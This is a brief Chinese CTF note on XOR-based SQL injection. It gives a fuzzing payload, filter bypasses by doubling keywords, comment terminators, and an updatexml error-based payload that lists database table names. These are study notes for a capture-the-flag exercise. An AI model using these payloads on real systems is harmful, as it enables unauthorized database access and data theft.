【ctf】異或注入

снυαιαм ιее發表於2020-11-07

fuzz

'^(length("select")!=0)--+ 雙真或者雙假為假

繞過檢測方法:雙寫

seleselectct

註釋方法

‘ xxxx #

’ xxxx--+

or繞過

infoorrmation_schema

updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) %23

 

 

相關文章